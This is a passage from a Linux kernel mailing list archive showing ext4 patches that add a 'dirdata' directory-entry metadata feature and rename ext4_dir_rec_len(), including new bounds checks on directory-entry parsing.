+ unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len,
+ dir->i_sb->s_blocksize);
+
+ /* data_offset is relative to de->name, which itself starts
+ * EXT4_BASE_DIR_LEN bytes into the entry -- rec_len is relative to
+ * the start of the entry, so add the header size before comparing,
+ * or this lets reads run EXT4_BASE_DIR_LEN bytes past the entry. */
+ if (EXT4_BASE_DIR_LEN + data_offset > rec_len)
+ return ret;
+
+ /* compatibility: hash stored inline after filename (no dirdata) */
+ if (hinfo && !ext4_has_feature_dirdata(dir->i_sb) &&
+ ext4_hash_in_dirent(dir)) {
+ hinfo->hash = EXT4_DIRENT_HASH(de);
+ hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
+ ret |= EXT4_DIRENT_CFHASH;
+
+ return ret;
+ }
+
+ /* EXT4_DIRENT_* are not expected without flag in i_sb */
+ if (de->file_type & EXT4_DIRENT_LUFID) {
+ struct ext4_dirent_fid *disk_fid =
+ (struct ext4_dirent_fid *)(de->name + data_offset);
+ unsigned int dlen;
+
+ if (EXT4_BASE_DIR_LEN + data_offset + sizeof(disk_fid->df_header) > rec_len)
+ return ret;
+
+ dlen = disk_fid->df_header.ddh_length;
+ if (dlen < sizeof(*disk_fid) ||
+ EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len)
+ return ret;
+
+ if (dfid) {
+ /* copy the whole record (header + fid), not just the fid
+ * payload -- dlen already includes the header's length */
+ memcpy(dfid, disk_fid, dlen);
+ ret |= EXT4_DIRENT_LUFID;
+ }
+ data_offset += dlen;
+ }
+
+ /* Skip INO64 for now*/
+ if (de->file_type & EXT4_DIRENT_INO64) {
+ struct ext4_dirent_data_header *ddh =
+ (struct ext4_dirent_data_header *)(de->name + data_offset);
+ unsigned int dlen;
+
+ if (EXT4_BASE_DIR_LEN + data_offset + sizeof(*ddh) > rec_len)
+ return ret;
+
+ dlen = ddh->ddh_length;
+ if (dlen < sizeof(*ddh) ||
+ EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len)
+ return ret;
+
+ data_offset += dlen;
+ }
+
+ if (!hinfo)
+ return ret;
+
+ if (de->file_type & EXT4_DIRENT_CFHASH) {
+ struct ext4_dirent_hash *dh =
+ (struct ext4_dirent_hash *)(de->name + data_offset);
+ unsigned int dlen;
+
+ dlen = dh->dh_header.ddh_length;
+ if (dlen < sizeof(*dh) ||
+ EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len)
+ return ret;
+
+ hinfo->hash = le32_to_cpu(dh->dh_hash.hash);
+ hinfo->minor_hash = le32_to_cpu(dh->dh_hash.minor_hash);
+ ret |= EXT4_DIRENT_CFHASH;
+ }
+
+ return ret;
+}
+
+/*
+ * ext4_dirdata_set() - Write dirdata fields into a directory entry.
+ * @de: directory entry (name must already be set)
+ * @dir: directory inode
+ * @data: LUFID data to store (or NULL)
+ * @fname: filename info carrying the casefold hash
+ *
+ * Writes any required dirdata into @de after the filename. If the dirdata
+ * feature is not enabled, falls back to writing the hash inline after the
+ * filename (for compatibility with the older casefold+fscrypt format).
*/
+static void ext4_dirdata_set(struct ext4_dir_entry_2 *de, struct inode *dir,
+ struct ext4_dirent_fid *dfid,
+ struct ext4_filename *fname)
+{
+ struct dx_hash_info *hinfo = &fname->hinfo;
+ unsigned int data_offset = de->name_len + 1;
+ unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len,
+ dir->i_sb->s_blocksize);
+
+ /* de->name[] is declared with a fixed EXT4_NAME_LEN size, but the
+ * real backing storage is this entry's rec_len-sized space in the
+ * directory block; a max-length name (name_len == EXT4_NAME_LEN)
+ * leaves no declared array slot for the NUL terminator below, which
+ * FORTIFY_SOURCE treats as an out-of-bounds array write regardless
+ * of how much real space the entry has. */
+ if (dfid && de->name_len >= EXT4_NAME_LEN) {
+ EXT4_ERROR_INODE(dir, "Can not insert FID: name_len too long");
+ return;
+ }
+
+ /* always clear the gap byte at de->name[de->name_len], even when no
+ * FID is being appended -- otherwise it's never initialized before
+ * dirdata is written right after it, leaking a byte of stale memory
+ * to disk. Skip it for a max-length name: there's no declared array
+ * slot for it, and no dirdata can be appended in that case anyway
+ * (rejected above for dfid; data_offset would already be >= rec_len
+ * for any other dirdata kind). */
+ if (de->name_len < EXT4_NAME_LEN)
+ de->name[de->name_len] = 0;
+
+ if (dfid) {
+ unsigned int dlen = dfid->df_header.ddh_length;
+
+ if (EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len) {
+ EXT4_ERROR_INODE(dir, "Can not insert FID");
+ return;
+ }
+
+ memcpy(&de->name[de->name_len + 1], dfid,
+ dlen);
+ de->file_type |= EXT4_DIRENT_LUFID;
+ data_offset += dlen;
+ }
+
+ if (ext4_hash_in_dirent(dir)) {
+ if (ext4_has_feature_dirdata(dir->i_sb)) {
+ struct ext4_dirent_hash *dh =
+ (struct ext4_dirent_hash *)(de->name + data_offset);
+
+ if (EXT4_BASE_DIR_LEN + data_offset + sizeof(*dh) > rec_len) {
+ EXT4_ERROR_INODE(dir, "Can not insert dhash dirdata");
+ return;
+ }
+
+ dh->dh_header.ddh_length = sizeof(*dh);
+ dh->dh_hash.hash = cpu_to_le32(hinfo->hash);
+ dh->dh_hash.minor_hash = cpu_to_le32(hinfo->minor_hash);
+ de->file_type |= EXT4_DIRENT_CFHASH;
+ } else {
+ /* Compatibility: store hash inline after filename */
+ if (EXT4_BASE_DIR_LEN + data_offset +
+ sizeof(struct ext4_dir_entry_hash) > rec_len) {
+ EXT4_ERROR_INODE(dir, "Can not insert dhash");
+ return;
+ }
+
+ EXT4_DIRENT_HASHES(de)->hash = cpu_to_le32(hinfo->hash);
+ EXT4_DIRENT_HASHES(de)->minor_hash =
+ cpu_to_le32(hinfo->minor_hash);
+ }
+ }
+}
+
+
static int dx_make_map(struct inode *dir, struct buffer_head *bh,
struct dx_hash_info *hinfo,
struct dx_map_entry *map_tail)
@@ -1323,9 +1505,8 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
((char *)de) - base))
return -EFSCORRUPTED;
if (de->name_len && de->inode) {
- if (ext4_hash_in_dirent(dir))
- h.hash = EXT4_DIRENT_HASH(de);
- else {
+ if (!(ext4_dirdata_get(de, dir, NULL, &h) &
+ EXT4_DIRENT_CFHASH)) {
int err = ext4fs_dirhash(dir, de->name,
de->name_len, &h);
if (err < 0)
@@ -2113,13 +2294,7 @@ void ext4_insert_dentry_data(struct inode *dir, struct inode *inode,
ext4_set_de_type(inode->i_sb, de, inode->i_mode);
de->name_len = fname_len(fname);
memcpy(de->name, fname_name(fname), fname_len(fname));
- if (ext4_hash_in_dirent(dir)) {
- struct dx_hash_info *hinfo = &fname->hinfo;
-
- EXT4_DIRENT_HASHES(de)->hash = cpu_to_le32(hinfo->hash);
- EXT4_DIRENT_HASHES(de)->minor_hash =
- cpu_to_le32(hinfo->minor_hash);
- }
+ ext4_dirdata_set(de, dir, data, fname);
}
/*
--
2.43.7
^ permalink raw reply related
* [PATCH v4 09/11] ext4: dirdata feature
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, Pravin Shelar, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
When fscrypt and casefold are enabled together for a directory,
all ext4_dir_entry[_2] in that directory store a n 8-byte hash
of the filename after 'name' between 'name_len' and 'rec_len'.
However, there is no clear indication there is important data
stored in these bytes, which are only for padding and alignment
in other directory entries. This adds complexity to code handling
the on-disk directory entries, and there is no provision for other
metadata to be stored in each dir entry after 'name'.
The dirdata feature adds a mechanism to store multiple metadata
entries in each dir entry after 'name' (including the fchash).
The unused high 4 bits of 'file_type' are used to indicate whether
additional data fields are stored after 'name'. If a bit is set,
the corresponding dirdata record is present, starting after a NUL
filename terminator. If present, a record starts with a 1-byte
length (including the length byte itself) and the data immediately
follows the length byte without any alignment.
This allows up to four different dirdata records to be stored in
each entry, and allows unhandled record bytes to be skipped without
having to process the contents, providing forward compatibility.
If and when the fourth and last dirdata record is needed, it is
recommended to further subdivide it into sub-records, with
the first byte being the total length, and then there being a
second byte that gives the sub-record length, etc. as long as
the total record length is less than 255 bytes. However, this
would not affect compatibility with the current code since the
record length would allow it to be skipped without processing.
Signed-off-by: Pravin Shelar <pravin.shelar@sun.com>
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 27 +++++++++++++++++++++------
fs/ext4/inline.c | 23 +++++++++++++++++++----
fs/ext4/namei.c | 45 +++++++++++++++++++++++----------------------
fs/ext4/sysfs.c | 2 ++
4 files changed, 65 insertions(+), 32 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 2fc9fa6d3021..1e61ce13ed07 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -2334,6 +2334,7 @@ EXT4_FEATURE_INCOMPAT_FUNCS(casefold, CASEFOLD)
EXT4_FEATURE_INCOMPAT_FLEX_BG| \
EXT4_FEATURE_INCOMPAT_EA_INODE| \
EXT4_FEATURE_INCOMPAT_MMP | \
+ EXT4_FEATURE_INCOMPAT_DIRDATA | \
EXT4_FEATURE_INCOMPAT_INLINE_DATA | \
EXT4_FEATURE_INCOMPAT_ENCRYPT | \
EXT4_FEATURE_INCOMPAT_CASEFOLD | \
@@ -3035,10 +3036,18 @@ extern int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
struct ext4_filename *fname,
struct ext4_dir_entry_2 **dest_de,
int dlen);
-void ext4_insert_dentry(struct inode *dir, struct inode *inode,
- struct ext4_dir_entry_2 *de,
- int buf_size,
- struct ext4_filename *fname);
+void ext4_insert_dentry_data(struct inode *dir, struct inode *inode,
+ struct ext4_dir_entry_2 *de,
+ int buf_size,
+ struct ext4_filename *fname,
+ void *data);
+static inline void ext4_insert_dentry(struct inode *dir, struct inode *inode,
+ struct ext4_dir_entry_2 *de,
+ int buf_size,
+ struct ext4_filename *fname)
+{
+ ext4_insert_dentry_data(dir, inode, de, buf_size, fname, NULL);
+}
static inline void ext4_update_dx_flag(struct inode *inode)
{
if (!ext4_has_feature_dir_index(inode->i_sb) &&
@@ -3283,8 +3292,14 @@ extern int ext4_ext_migrate(struct inode *);
extern int ext4_ind_migrate(struct inode *inode);
/* namei.c */
-extern int ext4_init_new_dir(handle_t *handle, struct inode *dir,
- struct inode *inode);
+extern int ext4_init_new_dir_data(handle_t *handle, struct inode *dir,
+ struct inode *inode,
+ const void *data1, const void *data2);
+static inline int ext4_init_new_dir(handle_t *handle, struct inode *dir,
+ struct inode *inode)
+{
+ return ext4_init_new_dir_data(handle, dir, inode, NULL, NULL);
+}
extern int ext4_dirblock_csum_verify(struct inode *inode,
struct buffer_head *bh);
extern int ext4_htree_fill_tree(struct file *dir_file, __u32 start_hash,
diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
index 5b3faacdf143..1fff4defd45b 100644
--- a/fs/ext4/inline.c
+++ b/fs/ext4/inline.c
@@ -973,11 +973,16 @@ static int ext4_add_dirent_to_inline(handle_t *handle,
struct ext4_iloc *iloc,
void *inline_start, int inline_size)
{
- int err;
+ int err, dlen = 0;
struct ext4_dir_entry_2 *de;
+ unsigned char *data = NULL;
+
+ /* Deliver data in any appropriate way here. Now it is NULL */
+ if (data)
+ dlen = (*data) + 1;
err = ext4_find_dest_de(dir, iloc->bh, inline_start,
- inline_size, fname, &de, 0);
+ inline_size, fname, &de, dlen);
if (err)
return err;
@@ -986,7 +991,7 @@ static int ext4_add_dirent_to_inline(handle_t *handle,
EXT4_JTR_NONE);
if (err)
return err;
- ext4_insert_dentry(dir, inode, de, inline_size, fname);
+ ext4_insert_dentry_data(dir, inode, de, inline_size, fname, NULL);
ext4_show_inline_dir(dir, iloc->bh, inline_start, inline_size);
@@ -1326,7 +1331,17 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
pos = EXT4_INLINE_DOTDOT_SIZE;
} else {
de = (struct ext4_dir_entry_2 *)(dir_buf + pos);
- pos += ext4_rec_len_from_disk(de->rec_len, inline_size);
+ /* Use ext4_dir_entry_len to account for dirdata extensions.
+ * This buffer is the inline-data buffer (inline_size bytes),
+ * not a full directory block -- pass the real buffer size so
+ * a corrupted/sentinel on-disk rec_len doesn't get decoded as
+ * a full block's worth of bytes. */
+ pos += ext4_dir_entry_len(de, inline_size, dir);
+ /* Validate pos doesn't exceed buffer to prevent use-after-free */
+ if (pos > inline_size) {
+ ret = count;
+ goto out;
+ }
if (ext4_check_dir_entry(inode, dir_file, de,
iloc.bh, dir_buf,
inline_size, pos)) {
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 73c8f1b399ef..91def9e0f84d 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -401,23 +401,26 @@ static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
{
struct ext4_dir_entry_2 *de;
struct dx_root_info *root;
- int count_offset;
+ int count_offset, dotdot_rec_len;
int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
unsigned int rlen = ext4_rec_len_from_disk(dirent->rec_len, blocksize);
- if (rlen == blocksize)
+ if (rlen == blocksize) {
count_offset = sizeof(struct dx_node);
- else if (rlen == 12) {
- de = (struct ext4_dir_entry_2 *)(((void *)dirent) + 12);
- if (ext4_rec_len_from_disk(de->rec_len, blocksize) != blocksize - 12)
+ } else {
+ de = (struct ext4_dir_entry_2 *)(((char *)dirent) + rlen);
+ if (le16_to_cpu(de->rec_len) != (blocksize - rlen))
return NULL;
- root = (struct dx_root_info *)(((void *)de + 12));
+ /* de->rec_len covers whole dx_root block, calculate actual length.
+ * This is the '..' entry, which never carries the casefold+fscrypt
+ * hash, so pass NULL for dir regardless of the directory's flags */
+ dotdot_rec_len = ext4_dir_entry_len(de, blocksize, NULL);
+ root = (struct dx_root_info *)(((char *)de + dotdot_rec_len));
if (root->reserved_zero ||
root->info_length != sizeof(struct dx_root_info))
return NULL;
- count_offset = 32;
- } else
- return NULL;
+ count_offset = root->info_length + rlen + dotdot_rec_len;
+ }
if (offset)
*offset = count_offset;
@@ -716,7 +719,7 @@ static struct stats dx_show_leaf(struct inode *dir,
(unsigned) ((char *) de - base));
#endif
}
- space += ext4_dir_rec_len(de->name_len, dir);
+ space += ext4_dir_entry_len(de, size, dir);
names++;
}
de = ext4_next_entry(de, size);
@@ -2090,13 +2093,10 @@ int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
return 0;
}
-void ext4_insert_dentry(struct inode *dir,
- struct inode *inode,
- struct ext4_dir_entry_2 *de,
- int buf_size,
- struct ext4_filename *fname)
+void ext4_insert_dentry_data(struct inode *dir, struct inode *inode,
+ struct ext4_dir_entry_2 *de, int buf_size,
+ struct ext4_filename *fname, void *data)
{
-
int nlen, rlen;
nlen = ext4_dir_entry_len(de, buf_size, dir);
@@ -2138,15 +2138,15 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
unsigned int blocksize = dir->i_sb->s_blocksize;
int csum_size = 0;
int err, err2, dlen = 0;
- unsigned char *data = NULL;
+ struct ext4_dirent_fid *dfid = NULL;
/* Deliver data in any appropriate way here. Now it is NULL */
if (ext4_has_feature_metadata_csum(inode->i_sb))
csum_size = sizeof(struct ext4_dir_entry_tail);
if (!de) {
- if (data)
- dlen = (*data) + 1;
+ if (dfid)
+ dlen = dfid->df_header.ddh_length;
err = ext4_find_dest_de(dir, bh, bh->b_data,
blocksize - csum_size, fname, &de, dlen);
if (err)
@@ -2161,7 +2161,7 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
}
/* By now the buffer is marked for journaling */
- ext4_insert_dentry(dir, inode, de, blocksize, fname);
+ ext4_insert_dentry_data(dir, inode, de, blocksize, fname, dfid);
/*
* XXX shouldn't update any times until successful
@@ -3000,8 +3000,9 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
return ext4_handle_dirty_dirblock(handle, inode, bh);
}
-int ext4_init_new_dir(handle_t *handle, struct inode *dir,
- struct inode *inode)
+int ext4_init_new_dir_data(handle_t *handle, struct inode *dir,
+ struct inode *inode,
+ const void *data1, const void *data2)
{
struct buffer_head *dir_block = NULL;
ext4_lblk_t block = 0;
diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
index 923b375e017f..80074fb15ee9 100644
--- a/fs/ext4/sysfs.c
+++ b/fs/ext4/sysfs.c
@@ -362,6 +362,7 @@ EXT4_ATTR_FEATURE(verity);
#endif
EXT4_ATTR_FEATURE(metadata_csum_seed);
EXT4_ATTR_FEATURE(fast_commit);
+EXT4_ATTR_FEATURE(dirdata);
#if IS_ENABLED(CONFIG_UNICODE) && defined(CONFIG_FS_ENCRYPTION)
EXT4_ATTR_FEATURE(encrypted_casefold);
#endif
@@ -385,6 +386,7 @@ static struct attribute *ext4_feat_attrs[] = {
#endif
ATTR_LIST(metadata_csum_seed),
ATTR_LIST(fast_commit),
+ ATTR_LIST(dirdata),
#if IS_ENABLED(CONFIG_UNICODE) && defined(CONFIG_FS_ENCRYPTION)
ATTR_LIST(encrypted_casefold),
#endif
--
2.43.7
^ permalink raw reply related
* [PATCH v4 08/11] ext4: rename ext4_dir_rec_len() and clarify dirdata usage
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Rename ext4_dir_rec_len() to ext4_dirent_rec_len() to better
reflect that it computes the record length for a directory
entry based on the provided name length.
Update the comment to clarify handling of dirdata-enabled
directories and document the use of ext4_dir_entry_len()
when dirdata is present.
No functional changes.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/dir.c | 9 +++--
fs/ext4/ext4.h | 14 +++++---
fs/ext4/inline.c | 14 ++++----
fs/ext4/namei.c | 89 ++++++++++++++++++++++++++++++++----------------
4 files changed, 80 insertions(+), 46 deletions(-)
diff --git a/fs/ext4/dir.c b/fs/ext4/dir.c
index 17edd678fa87..d22b09f86365 100644
--- a/fs/ext4/dir.c
+++ b/fs/ext4/dir.c
@@ -89,16 +89,15 @@ int __ext4_check_dir_entry(const char *function, unsigned int line,
bool fake = is_fake_dir_entry(de);
bool has_csum = ext4_has_feature_metadata_csum(dir->i_sb);
- if (unlikely(rlen < ext4_dir_rec_len(1, fake ? NULL : dir)))
+ if (unlikely(rlen < ext4_dirent_rec_len(1, fake ? NULL : dir)))
error_msg = "rec_len is smaller than minimal";
else if (unlikely(rlen % 4 != 0))
error_msg = "rec_len % 4 != 0";
- else if (unlikely(rlen < ext4_dir_rec_len(de->name_len,
- fake ? NULL : dir)))
+ else if (unlikely(rlen < ext4_dir_entry_len(de, size, fake ? NULL : dir)))
error_msg = "rec_len is too small for name_len";
else if (unlikely(next_offset > size))
error_msg = "directory entry overrun";
- else if (unlikely(next_offset > size - ext4_dir_rec_len(1,
+ else if (unlikely(next_offset > size - ext4_dirent_rec_len(1,
has_csum ? NULL : dir) &&
next_offset != size))
error_msg = "directory entry too close to block end";
@@ -245,7 +244,7 @@ static int ext4_readdir(struct file *file, struct dir_context *ctx)
* failure will be detected in the
* dirent test below. */
if (ext4_rec_len_from_disk(de->rec_len,
- sb->s_blocksize) < ext4_dir_rec_len(1,
+ sb->s_blocksize) < ext4_dirent_rec_len(1,
inode))
break;
i += ext4_rec_len_from_disk(de->rec_len,
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index a369a0cd04bc..2fc9fa6d3021 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -2616,11 +2616,16 @@ struct ext4_dirent_hash {
* casefolded and encrypted need to store the hash as well, so we add room for
* ext4_extended_dir_entry_2. For all entries related to '.' or '..' you should
* pass NULL for dir, as those entries do not use the extra fields.
+ *
+ * For directories with the dirdata feature, extra data may follow the filename.
+ * Use ext4_dir_entry_len() to compute the length of a directory entry
+ * including any dirdata, or ext4_dirent_rec_len() directly when the total
+ * name_len (including dirdata length) is already known.
*/
-static inline unsigned int ext4_dir_rec_len(__u8 name_len,
+static inline unsigned int ext4_dirent_rec_len(unsigned int name_len,
const struct inode *dir)
{
- int rec_len = (name_len + 8 + EXT4_DIR_ROUND);
+ unsigned int rec_len = (name_len + 8 + EXT4_DIR_ROUND);
if (dir && ext4_hash_in_dirent(dir))
rec_len += sizeof(struct ext4_dir_entry_hash);
@@ -3028,7 +3033,8 @@ extern void ext4_htree_free_dir_info(struct dir_private_info *p);
extern int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
void *buf, int buf_size,
struct ext4_filename *fname,
- struct ext4_dir_entry_2 **dest_de);
+ struct ext4_dir_entry_2 **dest_de,
+ int dlen);
void ext4_insert_dentry(struct inode *dir, struct inode *inode,
struct ext4_dir_entry_2 *de,
int buf_size,
@@ -4148,7 +4154,7 @@ static inline unsigned int ext4_dir_entry_len(struct ext4_dir_entry_2 *de,
unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len, blocksize);
unsigned int dirdata = ext4_dirent_get_data_len(de, rec_len);
- return ext4_dir_rec_len(de->name_len + dirdata, dir);
+ return ext4_dirent_rec_len(de->name_len + dirdata, dir);
}
extern const struct iomap_ops ext4_iomap_ops;
diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
index 8045e4ff270c..5b3faacdf143 100644
--- a/fs/ext4/inline.c
+++ b/fs/ext4/inline.c
@@ -977,7 +977,7 @@ static int ext4_add_dirent_to_inline(handle_t *handle,
struct ext4_dir_entry_2 *de;
err = ext4_find_dest_de(dir, iloc->bh, inline_start,
- inline_size, fname, &de);
+ inline_size, fname, &de, 0);
if (err)
return err;
@@ -1055,7 +1055,7 @@ static int ext4_update_inline_dir(handle_t *handle, struct inode *dir,
int old_size = EXT4_I(dir)->i_inline_size - EXT4_MIN_INLINE_DATA_SIZE;
int new_size = get_max_inline_xattr_value_size(dir, iloc);
- if (new_size - old_size <= ext4_dir_rec_len(1, NULL))
+ if (new_size - old_size <= ext4_dirent_rec_len(1, NULL))
return -ENOSPC;
ret = ext4_update_inline_data(handle, dir,
@@ -1309,7 +1309,7 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
fake.name_len = 1;
memcpy(fake.name, ".", 2);
fake.rec_len = ext4_rec_len_to_disk(
- ext4_dir_rec_len(fake.name_len, NULL),
+ ext4_dirent_rec_len(fake.name_len, NULL),
inline_size);
ext4_set_de_type(inode->i_sb, &fake, S_IFDIR);
de = &fake;
@@ -1319,7 +1319,7 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
fake.name_len = 2;
memcpy(fake.name, "..", 3);
fake.rec_len = ext4_rec_len_to_disk(
- ext4_dir_rec_len(fake.name_len, NULL),
+ ext4_dirent_rec_len(fake.name_len, NULL),
inline_size);
ext4_set_de_type(inode->i_sb, &fake, S_IFDIR);
de = &fake;
@@ -1427,8 +1427,8 @@ int ext4_read_inline_dir(struct file *file,
* So we will use extra_offset and extra_size to indicate them
* during the inline dir iteration.
*/
- dotdot_offset = ext4_dir_rec_len(1, NULL);
- dotdot_size = dotdot_offset + ext4_dir_rec_len(2, NULL);
+ dotdot_offset = ext4_dirent_rec_len(1, NULL);
+ dotdot_size = dotdot_offset + ext4_dirent_rec_len(2, NULL);
extra_offset = dotdot_size - EXT4_INLINE_DOTDOT_SIZE;
extra_size = extra_offset + inline_size;
@@ -1463,7 +1463,7 @@ int ext4_read_inline_dir(struct file *file,
* failure will be detected in the
* dirent test below. */
if (ext4_rec_len_from_disk(de->rec_len, extra_size)
- < ext4_dir_rec_len(1, NULL))
+ < ext4_dirent_rec_len(1, NULL))
break;
i += ext4_rec_len_from_disk(de->rec_len,
extra_size);
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index e2dda8dee77c..73c8f1b399ef 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -527,13 +527,21 @@ ext4_next_entry(struct ext4_dir_entry_2 *p, unsigned long blocksize)
* Future: use high four bits of block for coalesce-on-delete flags
* Mask them off for now.
*/
-static struct dx_root_info *dx_get_dx_info(void *de_buf)
+static struct dx_root_info *dx_get_dx_info(struct inode *dir, void *de_buf)
{
- /* get dotdot first */
- de_buf = de_buf + ext4_dir_rec_len(1, NULL);
+ unsigned int blocksize = dir->i_sb->s_blocksize;
+ void *base = de_buf;
+
+ /* get dotdot first; '.' and '..' never carry the casefold+fscrypt
+ * hash, so pass NULL for dir regardless of the directory's flags */
+ de_buf += ext4_dir_entry_len(de_buf, blocksize, NULL);
/* dx root info is after dotdot entry */
- de_buf = de_buf + ext4_dir_rec_len(2, NULL);
+ de_buf += ext4_dir_entry_len(de_buf, blocksize, NULL);
+
+ if (de_buf < base || (char *)de_buf - (char *)base +
+ sizeof(struct dx_root_info) > blocksize)
+ return ERR_PTR(-EFSCORRUPTED);
return (struct dx_root_info *)de_buf;
}
@@ -584,7 +592,9 @@ static inline unsigned dx_root_limit(struct inode *dir,
struct dx_root_info *info;
unsigned int entry_space;
- info = dx_get_dx_info(dot_de);
+ info = dx_get_dx_info(dir, dot_de);
+ if (IS_ERR(info))
+ return 0;
entry_space = dir->i_sb->s_blocksize - ((char *)info - (char *)dot_de) -
info->info_length;
@@ -596,7 +606,7 @@ static inline unsigned dx_root_limit(struct inode *dir,
static inline unsigned dx_node_limit(struct inode *dir)
{
unsigned int entry_space = dir->i_sb->s_blocksize -
- ext4_dir_rec_len(0, dir);
+ ext4_dirent_rec_len(0, dir);
if (ext4_has_feature_metadata_csum(dir->i_sb))
entry_space -= sizeof(struct dx_tail);
@@ -800,7 +810,9 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
if (IS_ERR(frame->bh))
return (struct dx_frame *) frame->bh;
- info = dx_get_dx_info((struct ext4_dir_entry_2 *)frame->bh->b_data);
+ info = dx_get_dx_info(dir, (struct ext4_dir_entry_2 *)frame->bh->b_data);
+ if (IS_ERR(info))
+ goto fail;
if (info->hash_version != DX_HASH_TEA &&
info->hash_version != DX_HASH_HALF_MD4 &&
info->hash_version != DX_HASH_LEGACY &&
@@ -945,7 +957,7 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
return ret_err;
}
-static void dx_release(struct dx_frame *frames)
+static void dx_release(struct inode *dir, struct dx_frame *frames)
{
struct dx_root_info *info;
int i;
@@ -954,7 +966,9 @@ static void dx_release(struct dx_frame *frames)
if (frames[0].bh == NULL)
return;
- info = dx_get_dx_info((struct ext4_dir_entry_2 *)frames[0].bh->b_data);
+ info = dx_get_dx_info(dir, (struct ext4_dir_entry_2 *)frames[0].bh->b_data);
+ if (IS_ERR(info))
+ return;
/* save local copy, "info" may be freed after brelse() */
indirect_levels = info->indirect_levels;
for (i = 0; i <= indirect_levels; i++) {
@@ -1066,7 +1080,7 @@ static int htree_dirblock_to_tree(struct file *dir_file,
/* csum entries are not larger in the casefolded encrypted case */
top = (struct ext4_dir_entry_2 *) ((char *) de +
dir->i_sb->s_blocksize -
- ext4_dir_rec_len(0,
+ ext4_dirent_rec_len(0,
csum ? NULL : dir));
/* Check if the directory is encrypted */
if (IS_ENCRYPTED(dir)) {
@@ -1260,12 +1274,12 @@ int ext4_htree_fill_tree(struct file *dir_file, __u32 start_hash,
(count && ((hashval & 1) == 0)))
break;
}
- dx_release(frames);
+ dx_release(dir, frames);
dxtrace(printk(KERN_DEBUG "Fill tree: returned %d entries, "
"next hash: %x\n", count, *next_hash));
return count;
errout:
- dx_release(frames);
+ dx_release(dir, frames);
return (err);
}
@@ -1763,7 +1777,7 @@ static struct buffer_head * ext4_dx_find_entry(struct inode *dir,
errout:
dxtrace(printk(KERN_DEBUG "%s not found\n", fname->usr_fname->name));
success:
- dx_release(frames);
+ dx_release(dir, frames);
return bh;
}
@@ -1860,7 +1874,7 @@ dx_move_dirents(struct inode *dir, char *from, char *to,
while (count--) {
struct ext4_dir_entry_2 *de = (struct ext4_dir_entry_2 *)
(from + (map->offs<<2));
- rec_len = ext4_dir_rec_len(de->name_len, dir);
+ rec_len = ext4_dir_entry_len(de, blocksize, dir);
memcpy (to, de, rec_len);
((struct ext4_dir_entry_2 *) to)->rec_len =
@@ -1893,7 +1907,7 @@ static struct ext4_dir_entry_2 *dx_pack_dirents(struct inode *dir, char *base,
while ((char*)de < base + blocksize) {
next = ext4_next_entry(de, blocksize);
if (de->inode && de->name_len) {
- rec_len = ext4_dir_rec_len(de->name_len, dir);
+ rec_len = ext4_dir_entry_len(de, blocksize, dir);
if (de > to)
memmove(to, de, rec_len);
to->rec_len = ext4_rec_len_to_disk(rec_len, blocksize);
@@ -2045,10 +2059,11 @@ static struct ext4_dir_entry_2 *do_split(handle_t *handle, struct inode *dir,
int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
void *buf, int buf_size,
struct ext4_filename *fname,
- struct ext4_dir_entry_2 **dest_de)
+ struct ext4_dir_entry_2 **dest_de,
+ int dlen)
{
struct ext4_dir_entry_2 *de;
- unsigned short reclen = ext4_dir_rec_len(fname_len(fname), dir);
+ unsigned short reclen = ext4_dirent_rec_len(fname_len(fname) + dlen, dir);
int nlen, rlen;
unsigned int offset = 0;
char *top;
@@ -2061,7 +2076,7 @@ int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
return -EFSCORRUPTED;
if (ext4_match(dir, fname, de))
return -EEXIST;
- nlen = ext4_dir_rec_len(de->name_len, dir);
+ nlen = ext4_dir_entry_len(de, buf_size, dir);
